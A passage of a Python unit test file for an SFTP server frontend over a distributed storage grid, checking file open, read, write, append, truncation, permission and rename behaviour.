self.handler.openFile, "uri/"+self.unknown_uri, sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir uri READ denied",
self.handler.openFile, "uri/"+self.tiny_lit_dir_uri, sftp.FXF_READ, {}))
# FIXME: should be FX_NO_SUCH_FILE?
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile noexist uri READ denied",
self.handler.openFile, "uri/URI:noexist", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile invalid UTF-8 uri READ denied",
self.handler.openFile, "uri/URI:\xFF", sftp.FXF_READ, {}))
# reading an existing file should succeed
d.addCallback(lambda ign: self.handler.openFile("small", sftp.FXF_READ, {}))
def _read_small(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.readChunk(2, 6))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "234567"))
d2.addCallback(lambda ign: rf.readChunk(1, 0))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: rf.readChunk(8, 4)) # read that starts before EOF is OK
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "89"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF (0-byte)",
rf.readChunk, 10, 0))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF",
rf.readChunk, 10, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting after EOF",
rf.readChunk, 11, 1))
d2.addCallback(lambda ign: rf.getAttrs())
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d2.addCallback(lambda ign: self.handler.getAttrs("small", followLinks=0))
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "writeChunk on read-only handle denied",
rf.writeChunk, 0, "a"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "setAttrs on read-only handle denied",
rf.setAttrs, {}))
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "readChunk on closed file bad",
rf.readChunk, 0, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "getAttrs on closed file bad",
rf.getAttrs))
d2.addCallback(lambda ign: rf.close()) # should be no-op
return d2
d.addCallback(_read_small)
# repeat for a large file
gross = u"gro\u00DF".encode("utf-8")
d.addCallback(lambda ign: self.handler.openFile(gross, sftp.FXF_READ, {}))
def _read_gross(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.readChunk(2, 6))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "234567"))
d2.addCallback(lambda ign: rf.readChunk(1, 0))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: rf.readChunk(1008, 4)) # read that starts before EOF is OK
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "89"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF (0-byte)",
rf.readChunk, 1010, 0))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF",
rf.readChunk, 1010, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting after EOF",
rf.readChunk, 1011, 1))
d2.addCallback(lambda ign: rf.getAttrs())
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 1010}))
d2.addCallback(lambda ign: self.handler.getAttrs(gross, followLinks=0))
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 1010}))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "writeChunk on read-only handle denied",
rf.writeChunk, 0, "a"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "setAttrs on read-only handle denied",
rf.setAttrs, {}))
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "readChunk on closed file",
rf.readChunk, 0, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "getAttrs on closed file",
rf.getAttrs))
d2.addCallback(lambda ign: rf.close()) # should be no-op
return d2
d.addCallback(_read_gross)
# reading an existing small file via uri/ should succeed
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.small_uri, sftp.FXF_READ, {}))
def _read_small_uri(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_small_uri)
# repeat for a large file
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.gross_uri, sftp.FXF_READ, {}))
def _read_gross_uri(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_gross_uri)
# repeat for a mutable file
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.mutable_uri, sftp.FXF_READ, {}))
def _read_mutable_uri(rf):
d2 = rf.readChunk(0, 100)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable file contents"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_mutable_uri)
# repeat for a file within a directory referenced by URI
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.tiny_lit_dir_uri+"/short", sftp.FXF_READ, {}))
def _read_short(rf):
d2 = rf.readChunk(0, 100)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "The end."))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_short)
# check that failed downloads cause failed reads. Note that this
# trashes the grid (by deleting all shares), so this must be at the
# end of the test function.
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.gross_uri, sftp.FXF_READ, {}))
def _read_broken(rf):
d2 = defer.succeed(None)
d2.addCallback(lambda ign: self.g.nuke_from_orbit())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read broken",
rf.readChunk, 0, 100))
# close shouldn't fail
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
return d2
d.addCallback(_read_broken)
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_openFile_read_error(self):
# The check at the end of openFile_read tested this for large files,
# but it trashed the grid in the process, so this needs to be a
# separate test.
small = upload.Data("0123456789"*10, None)
d = self._set_up("openFile_read_error")
d.addCallback(lambda ign: self.root.add_file(u"small", small))
d.addCallback(lambda n: self.handler.openFile("/uri/"+n.get_uri(), sftp.FXF_READ, {}))
def _read_broken(rf):
d2 = defer.succeed(None)
d2.addCallback(lambda ign: self.g.nuke_from_orbit())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read broken",
rf.readChunk, 0, 100))
# close shouldn't fail
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
return d2
d.addCallback(_read_broken)
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_openFile_write(self):
d = self._set_up("openFile_write")
d.addCallback(lambda ign: self._set_up_tree())
# '' is an invalid filename
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile '' WRITE|CREAT|TRUNC nosuch",
self.handler.openFile, "", sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
# TRUNC is not valid without CREAT if the file does not already exist
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile newfile WRITE|TRUNC nosuch",
self.handler.openFile, "newfile", sftp.FXF_WRITE | sftp.FXF_TRUNC, {}))
# EXCL is not valid without CREAT
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "openFile small WRITE|EXCL bad",
self.handler.openFile, "small", sftp.FXF_WRITE | sftp.FXF_EXCL, {}))
# cannot write to an existing directory
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir WRITE denied",
self.handler.openFile, "tiny_lit_dir", sftp.FXF_WRITE, {}))
# cannot write to an existing unknown
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown WRITE denied",
self.handler.openFile, "unknown", sftp.FXF_WRITE, {}))
# cannot create a child of an unknown
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown/newfile WRITE|CREAT denied",
self.handler.openFile, "unknown/newfile",
sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
# cannot write to a new file in an immutable directory
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir/newfile WRITE|CREAT|TRUNC denied",
self.handler.openFile, "tiny_lit_dir/newfile",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
# cannot write to an existing immutable file in an immutable directory (with or without CREAT and EXCL)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir/short WRITE denied",
self.handler.openFile, "tiny_lit_dir/short", sftp.FXF_WRITE, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir/short WRITE|CREAT denied",
self.handler.openFile, "tiny_lit_dir/short",
sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
# cannot write to a mutable file via a readonly cap (by path or uri)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile readonly WRITE denied",
self.handler.openFile, "readonly", sftp.FXF_WRITE, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile readonly uri WRITE denied",
self.handler.openFile, "uri/"+self.readonly_uri, sftp.FXF_WRITE, {}))
# cannot create a file with the EXCL flag if it already exists
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile small WRITE|CREAT|EXCL failure",
self.handler.openFile, "small",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile mutable WRITE|CREAT|EXCL failure",
self.handler.openFile, "mutable",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile mutable uri WRITE|CREAT|EXCL failure",
self.handler.openFile, "uri/"+self.mutable_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile tiny_lit_dir/short WRITE|CREAT|EXCL failure",
self.handler.openFile, "tiny_lit_dir/short",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
# cannot write to an immutable file if we don't have its parent (with or without CREAT, TRUNC, or EXCL)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE denied",
self.handler.openFile, "uri/"+self.small_uri, sftp.FXF_WRITE, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE|CREAT denied",
self.handler.openFile, "uri/"+self.small_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE|CREAT|TRUNC denied",
self.handler.openFile, "uri/"+self.small_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE|CREAT|EXCL denied",
self.handler.openFile, "uri/"+self.small_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
# test creating a new file with truncation and extension
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
def _write(wf):
d2 = wf.writeChunk(0, "0123456789")
d2.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
d2.addCallback(lambda ign: wf.writeChunk(8, "0123"))
d2.addCallback(lambda ign: wf.writeChunk(13, "abc"))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 16}))
d2.addCallback(lambda ign: self.handler.getAttrs("newfile", followLinks=0))
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 16}))
d2.addCallback(lambda ign: wf.setAttrs({}))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "setAttrs with negative size bad",
wf.setAttrs, {'size': -1}))
d2.addCallback(lambda ign: wf.setAttrs({'size': 14}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 14))
d2.addCallback(lambda ign: wf.setAttrs({'size': 14}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 14))
d2.addCallback(lambda ign: wf.setAttrs({'size': 17}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 17))
d2.addCallback(lambda ign: self.handler.getAttrs("newfile", followLinks=0))
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 17))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "readChunk on write-only handle denied",
wf.readChunk, 0, 1))
d2.addCallback(lambda ign: wf.close())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "writeChunk on closed file bad",
wf.writeChunk, 0, "a"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "setAttrs on closed file bad",
wf.setAttrs, {'size': 0}))
d2.addCallback(lambda ign: wf.close()) # should be no-op
return d2
d.addCallback(_write)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345670123\x00a\x00\x00\x00"))
# test APPEND flag, and also replacing an existing file ("newfile" created by the previous test)
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_TRUNC | sftp.FXF_APPEND, {}))
def _write_append(wf):
d2 = wf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: wf.writeChunk(8, "0123"))
d2.addCallback(lambda ign: wf.setAttrs({'size': 17}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 17))
d2.addCallback(lambda ign: wf.writeChunk(0, "z"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_append)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234567890123\x00\x00\x00z"))
# test WRITE | TRUNC without CREAT, when the file already exists
# This is invalid according to section 6.3 of the SFTP spec, but required for interoperability,
# since POSIX does allow O_WRONLY | O_TRUNC.
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_TRUNC, {}))
def _write_trunc(wf):
d2 = wf.writeChunk(0, "01234")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_trunc)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234"))
# test WRITE | TRUNC with permissions: 0
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_TRUNC, {'permissions': 0}))
d.addCallback(_write_trunc)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234"))
d.addCallback(lambda ign: self.root.get_metadata_for(u"newfile"))
d.addCallback(lambda metadata: self.failIf(metadata.get('no-write', False), metadata))
# test EXCL flag
d.addCallback(lambda ign:
self.handler.openFile("excl", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_TRUNC | sftp.FXF_EXCL, {}))
def _write_excl(wf):
d2 = self.root.get(u"excl")
d2.addCallback(lambda node: download_to_data(node))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: wf.writeChunk(0, "0123456789"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_excl)
d.addCallback(lambda ign: self.root.get(u"excl"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
# test that writing a zero-length file with EXCL only updates the directory once
d.addCallback(lambda ign:
self.handler.openFile("zerolength", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_EXCL, {}))
def _write_excl_zerolength(wf):
d2 = self.root.get(u"zerolength")
d2.addCallback(lambda node: download_to_data(node))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
# FIXME: no API to get the best version number exists (fix as part of #993)
"""
d2.addCallback(lambda ign: self.root.get_best_version_number())
def _check_version(version):
d3 = wf.close()
d3.addCallback(lambda ign: self.root.get_best_version_number())
d3.addCallback(lambda new_version: self.failUnlessReallyEqual(new_version, version))
return d3
d2.addCallback(_check_version)
"""
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_excl_zerolength)
d.addCallback(lambda ign: self.root.get(u"zerolength"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
# test WRITE | CREAT | EXCL | APPEND
d.addCallback(lambda ign:
self.handler.openFile("exclappend", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_EXCL | sftp.FXF_APPEND, {}))
def _write_excl_append(wf):
d2 = self.root.get(u"exclappend")
d2.addCallback(lambda node: download_to_data(node))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: wf.writeChunk(10, "0123456789"))
d2.addCallback(lambda ign: wf.writeChunk(5, "01234"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_excl_append)
d.addCallback(lambda ign: self.root.get(u"exclappend"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345678901234"))
# test WRITE | CREAT | APPEND when the file does not already exist
d.addCallback(lambda ign:
self.handler.openFile("creatappend", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_APPEND, {}))
def _write_creat_append_new(wf):
d2 = wf.writeChunk(10, "0123456789")
d2.addCallback(lambda ign: wf.writeChunk(5, "01234"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_append_new)
d.addCallback(lambda ign: self.root.get(u"creatappend"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345678901234"))
# ... and when it does exist
d.addCallback(lambda ign:
self.handler.openFile("creatappend", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_APPEND, {}))
def _write_creat_append_existing(wf):
d2 = wf.writeChunk(5, "01234")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_append_existing)
d.addCallback(lambda ign: self.root.get(u"creatappend"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234567890123401234"))
# test WRITE | CREAT without TRUNC, when the file does not already exist
d.addCallback(lambda ign:
self.handler.openFile("newfile2", sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
def _write_creat_new(wf):
d2 = wf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_new)
d.addCallback(lambda ign: self.root.get(u"newfile2"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
# ... and when it does exist
d.addCallback(lambda ign:
self.handler.openFile("newfile2", sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
def _write_creat_existing(wf):
d2 = wf.writeChunk(0, "abcde")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_existing)
d.addCallback(lambda ign: self.root.get(u"newfile2"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcde56789"))
d.addCallback(lambda ign: self.root.set_node(u"mutable2", self.mutable))
# test writing to a mutable file
d.addCallback(lambda ign:
self.handler.openFile("mutable", sftp.FXF_WRITE, {}))
def _write_mutable(wf):
d2 = wf.writeChunk(8, "new!")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_mutable)
d.addCallback(lambda ign: self.root.get(u"mutable"))
def _check_same_file(node):
self.failUnless(node.is_mutable())
self.failIf(node.is_readonly())
self.failUnlessReallyEqual(node.get_uri(), self.mutable_uri)
return node.download_best_version()
d.addCallback(_check_same_file)
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable new! contents"))
# ... and with permissions, which should be ignored
d.addCallback(lambda ign:
self.handler.openFile("mutable", sftp.FXF_WRITE, {'permissions': 0}))
d.addCallback(_write_mutable)
d.addCallback(lambda ign: self.root.get(u"mutable"))
d.addCallback(_check_same_file)
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable new! contents"))
# ... and with a setAttrs call that diminishes the parent link to read-only, first by path
d.addCallback(lambda ign:
self.handler.openFile("mutable", sftp.FXF_WRITE, {}))
def _write_mutable_setattr(wf):
d2 = wf.writeChunk(8, "read-only link from parent")
d2.addCallback(lambda ign: self.handler.setAttrs("mutable", {'permissions': 0444}))
d2.addCallback(lambda ign: self.root.get(u"mutable"))
d2.addCallback(lambda node: self.failUnless(node.is_readonly()))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0666))
d2.addCallback(lambda ign: self.handler.getAttrs("mutable", followLinks=0))
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0444))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_mutable_setattr)
d.addCallback(lambda ign: self.root.get(u"mutable"))
def _check_readonly_file(node):
self.failUnless(node.is_mutable())
self.failUnless(node.is_readonly())
self.failUnlessReallyEqual(node.get_write_uri(), None)
self.failUnlessReallyEqual(node.get_storage_index(), self.mutable.get_storage_index())
return node.download_best_version()
d.addCallback(_check_readonly_file)
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable read-only link from parent"))
# ... and then by handle
d.addCallback(lambda ign:
self.handler.openFile("mutable2", sftp.FXF_WRITE, {}))
def _write_mutable2_setattr(wf):
d2 = wf.writeChunk(7, "2")
d2.addCallback(lambda ign: wf.setAttrs({'permissions': 0444, 'size': 8}))
# The link isn't made read-only until the file is closed.
d2.addCallback(lambda ign: self.root.get(u"mutable2"))
d2.addCallback(lambda node: self.failIf(node.is_readonly()))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0444))
d2.addCallback(lambda ign: self.handler.getAttrs("mutable2", followLinks=0))
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0666))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_mutable2_setattr)
d.addCallback(lambda ign: self.root.get(u"mutable2"))
d.addCallback(_check_readonly_file) # from above
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable2"))
# test READ | WRITE without CREAT or TRUNC
d.addCallback(lambda ign:
self.handler.openFile("small", sftp.FXF_READ | sftp.FXF_WRITE, {}))
def _read_write(rwf):
d2 = rwf.writeChunk(8, "0123")
# test immediate read starting after the old end-of-file
d2.addCallback(lambda ign: rwf.readChunk(11, 1))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "3"))
d2.addCallback(lambda ign: rwf.readChunk(0, 100))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345670123"))
d2.addCallback(lambda ign: rwf.close())
return d2
d.addCallback(_read_write)
d.addCallback(lambda ign: self.root.get(u"small"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345670123"))
# test WRITE and rename while still open
d.addCallback(lambda ign:
self.handler.openFile("small", sftp.FXF_WRITE, {}))
def _write_rename(wf):
d2 = wf.writeChunk(0, "abcd")
d2.addCallback(lambda ign: self.handler.renameFile("small", "renamed"))
d2.addCallback(lambda ign: wf.writeChunk(4, "efgh"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_rename)
d.addCallback(lambda ign: self.root.get(u"renamed"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcdefgh0123"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "rename small while open", "small",
self.root.get, u"small"))
# test WRITE | CREAT | EXCL and rename while still open
d.addCallback(lambda ign:
self.handler.openFile("newexcl", sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
def _write_creat_excl_rename(wf):
d2 = wf.writeChunk(0, "abcd")
d2.addCallback(lambda ign: self.handler.renameFile("newexcl", "renamedexcl"))
d2.addCallback(lambda ign: wf.writeChunk(4, "efgh"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_excl_rename)
d.addCallback(lambda ign: self.root.get(u"renamedexcl"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcdefgh"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "rename newexcl while open", "newexcl",
self.root.get, u"newexcl"))
# it should be possible to rename even before the open has completed
def _open_and_rename_race(ign):
slow_open = defer.Deferred()
reactor.callLater(1, slow_open.callback, None)
d2 = self.handler.openFile("new", sftp.FXF_WRITE | sftp.FXF_CREAT, {}, delay=slow_open)
# deliberate race between openFile and renameFile
d3 = self.handler.renameFile("new", "new2")
d3.addErrback(lambda err: self.fail("renameFile failed: %r" % (err,)))
return d2
d.addCallback(_open_and_rename_race)
def _write_rename_race(wf):
d2 = wf.writeChunk(0, "abcd")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_rename_race)
d.addCallback(lambda ign: self.root.get(u"new2"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcd"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "rename new while open", "new",
self.root.get, u"new"))
# check that failed downloads cause failed reads and failed close,
# when open for writing. Note that this trashes the grid (by deleting
# all shares), so this must be at the end of the test function.
gross = u"gro\u00DF".encode("utf-8")
d.addCallback(lambda ign: self.handler.openFile(gross, sftp.FXF_READ | sftp.FXF_WRITE, {}))
def _read_write_broken(rwf):
d2 = rwf.writeChunk(0, "abcdefghij")
d2.addCallback(lambda ign: self.g.nuke_from_orbit())
# reading should fail (reliably if we read past the written chunk)
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read/write broken",
rwf.readChunk, 0, 100))
# close should fail in this case
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read/write broken close",
rwf.close))
return d2
d.addCallback(_read_write_broken)
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_removeFile(self):
d = self._set_up("removeFile")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeFile nofile",
self.handler.removeFile, "nofile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeFile nofile",
self.handler.removeFile, "nofile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeFile nodir/file",
self.handler.removeFile, "nodir/file"))
d.addCallback(lambda ign:
